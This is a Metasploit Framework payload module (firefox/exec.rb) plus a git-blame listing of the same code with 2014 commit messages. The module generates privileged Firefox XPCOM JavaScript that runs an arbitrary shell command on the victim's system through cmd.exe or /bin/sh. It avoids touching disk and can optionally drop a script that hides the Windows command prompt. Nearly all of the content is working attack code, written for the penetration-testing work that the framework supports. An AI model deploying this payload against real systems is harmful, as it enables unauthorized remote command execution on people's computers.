metasploit-framework/modules/payloads/singles/firefox/exec.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Firefox

  def initialize(info={})
    super(merge_info(info,
      'Name'          => 'Firefox XPCOM Execute Command',
      'Description'   => %Q|
        This module runs a shell command on the target OS withough touching the disk.
        On Windows, this command will flash the command prompt momentarily.
        This can be avoided by setting WSCRIPT to true, which drops a jscript
        "launcher" to disk that hides the prompt.
      |,
      'Author'        => ['joev'],
      'License'       => BSD_LICENSE,
      'Platform'      => 'firefox',
      'Arch'          => ARCH_FIREFOX
    ))
    register_options([
      OptString.new('CMD', [true, "The command string to execute", 'touch /tmp/a.txt']),
      OptBool.new('WSCRIPT', [true, "On Windows, drop a vbscript to hide the cmd prompt", false])
    ], self.class)
  end

  def generate
    <<-EOS

      (function(){
        window = this;
        #{read_file_source if datastore['WSCRIPT']}
        #{run_cmd_source if datastore['WSCRIPT']}

        var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
        .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
        var windows = (ua.indexOf("Windows")>-1);

        var cmd = (#{JSON.unparse({ :cmd => datastore['CMD'] })}).cmd;
        if (#{datastore['WSCRIPT']} && windows) {
          runCmd(cmd);
        } else {
          var process = Components.classes["@mozilla.org/process/util;1"]
                          .createInstance(Components.interfaces.nsIProcess);
          var sh = Components.classes["@mozilla.org/file/local;1"]
                    .createInstance(Components.interfaces.nsILocalFile);
          var args;
          if (windows) {
            sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");
            args = ["/c", cmd];
          } else {
            sh.initWithPath("/bin/sh");
            args = ["-c", cmd];
          }
          process.init(sh);
          process.run(true, args, args.length);
        }
      })();

    EOS
  end
end
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`module Metasploit3`

			`include Msf::Payload::Single`
			`include Msf::Payload::Firefox`

			`def initialize(info={})`
			`super(merge_info(info,`
Pre-release title/desc fixes 2014-01-13 19:57:34 +00:00			`'Name' => 'Firefox XPCOM Execute Command',`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`'Description' => %Q\|`
Pre-release title/desc fixes 2014-01-13 19:57:34 +00:00			`This module runs a shell command on the target OS withough touching the disk.`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`On Windows, this command will flash the command prompt momentarily.`
Pre-release title/desc fixes 2014-01-13 19:57:34 +00:00			`This can be avoided by setting WSCRIPT to true, which drops a jscript`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`"launcher" to disk that hides the prompt.`
			`\|,`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`'Author' => ['joev'],`
			`'License' => BSD_LICENSE,`
			`'Platform' => 'firefox',`
			`'Arch' => ARCH_FIREFOX`
			`))`
			`register_options([`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`OptString.new('CMD', [true, "The command string to execute", 'touch /tmp/a.txt']),`
			`OptBool.new('WSCRIPT', [true, "On Windows, drop a vbscript to hide the cmd prompt", false])`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`], self.class)`
			`end`

			`def generate`
			`<<-EOS`

			`(function(){`
Install a global object in firefox payloads, bump jsobfu. 2014-09-24 21:05:00 +00:00			`window = this;`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`#{read_file_source if datastore['WSCRIPT']}`
			`#{run_cmd_source if datastore['WSCRIPT']}`

Fix bug in the firefox/exec payload. 2014-01-05 17:24:41 +00:00			`var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]`
			`.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;`
			`var windows = (ua.indexOf("Windows")>-1);`

Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`var cmd = (#{JSON.unparse({ :cmd => datastore['CMD'] })}).cmd;`
			`if (#{datastore['WSCRIPT']} && windows) {`
Fix bug in the firefox/exec payload. 2014-01-05 17:24:41 +00:00			`runCmd(cmd);`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`} else {`
			`var process = Components.classes["@mozilla.org/process/util;1"]`
			`.createInstance(Components.interfaces.nsIProcess);`
			`var sh = Components.classes["@mozilla.org/file/local;1"]`
			`.createInstance(Components.interfaces.nsILocalFile);`
			`var args;`
			`if (windows) {`
			`sh.initWithPath("C:\\\\Windows\\\\System32\\\\cmd.exe");`
			`args = ["/c", cmd];`
Fix bug in the firefox/exec payload. 2014-01-05 17:24:41 +00:00			`} else {`
Update exec to be diskless. 2014-01-04 14:48:58 +00:00			`sh.initWithPath("/bin/sh");`
			`args = ["-c", cmd];`
			`}`
			`process.init(sh);`
			`process.run(true, args, args.length);`
			`}`
Add exec payload. Cleans up a lot of code. Adds some yardocs and whatnot. 2014-01-04 00:23:48 +00:00			`})();`

			`EOS`
			`end`
			`end`